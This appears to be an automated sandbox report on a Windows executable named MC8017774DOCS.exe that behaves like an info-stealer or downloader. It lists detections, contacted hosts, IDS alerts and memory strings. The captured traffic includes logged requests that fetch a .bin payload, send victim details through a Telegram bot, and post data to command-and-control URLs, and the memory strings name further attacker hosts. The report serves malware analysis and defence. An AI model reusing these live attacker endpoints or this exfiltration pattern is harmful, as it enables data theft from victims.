Source: Yara match	File source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR

Remote Access Functionality

Source: Yara match

File source: 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR

Multi AV Scanner detection for submitted file

Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
185.244.144.68	mertvinc.com.tr	Turkey	199608	BIRBIRTR	false
5.182.211.149	the.drillmmcsnk.top	Netherlands	64425	SKB-ENTERPRISENL	false
172.67.177.134	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

Contacted Domains

Name	IP	Active
mertvinc.com.tr	185.244.144.68	true
reallyfreegeoip.org	172.67.177.134	true
api.telegram.org	149.154.167.220	true
the.drillmmcsnk.top	5.182.211.149	true
checkip.dyndns.com	132.226.8.169	true
checkip.dyndns.org	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://the.drillmmcsnk.top/den/P4.php	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.75	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20and%20Time:%2026/11/2024%20/%2015:27:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506013%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		high
http://mertvinc.com.tr/pqvBgXvmocLIihvW108.bin	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false		high

AV Detection

Source: MC8017774DOCS.exe	ReversingLabs: Detection: 42%
Source: MC8017774DOCS.exe	Virustotal: Detection: 48%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: MC8017774DOCS.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Uses insecure TLS / SSL version for HTTPS connection

Source: MC8017774DOCS.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.6:49815 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49907 version: TLS 1.2

Source: MC8017774DOCS.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: _.pdb source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 0_2_004065DA FindFirstFileW,FindClose,	0_2_004065DA
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004059A9
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20and%20Time:%2026/11/2024%20/%2015:27:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506013%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /den/P4.php HTTP/1.1Content-Type: text/plain; charset=utf-8Host: the.drillmmcsnk.topContent-Length: 1432Connection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 185.244.144.68 185.244.144.68

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

May check the online IP address of the machine

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49801 -> 185.244.144.68:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49808 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49826 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49838 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49821 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49890 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49902 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49871 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49882 -> 172.67.177.134:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /pqvBgXvmocLIihvW108.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: mertvinc.com.trCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.6:49815 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20and%20Time:%2026/11/2024%20/%2015:27:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506013%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /pqvBgXvmocLIihvW108.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: mertvinc.com.trCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: mertvinc.com.tr
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: the.drillmmcsnk.top

Source: unknown

HTTP traffic detected: POST /den/P4.php HTTP/1.1Content-Type: text/plain; charset=utf-8Host: the.drillmmcsnk.topContent-Length: 1432Connection: Keep-Alive

Source: global traffic

Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: MC8017774DOCS.exe, 00000004.00000002.3453102350.0000000003D73000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3453633751.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://mertvinc.com.tr/pqvBgXvmocLIihvW108.bin
Source: MC8017774DOCS.exe, 00000004.00000002.3453102350.0000000003D73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mertvinc.com.tr/pqvBgXvmocLIihvW108.binW
Source: MC8017774DOCS.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://the.drillmmcsnk.top
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://the.drillmmcsnk.top/den/P4.php
Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://the.drillmmcsnk.top/den/api.php
Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: MC8017774DOCS.exe, 00000004.00000001.2521521176.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: MC8017774DOCS.exe, 00000004.00000001.2521521176.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20a
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F1D000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F18000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enH
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
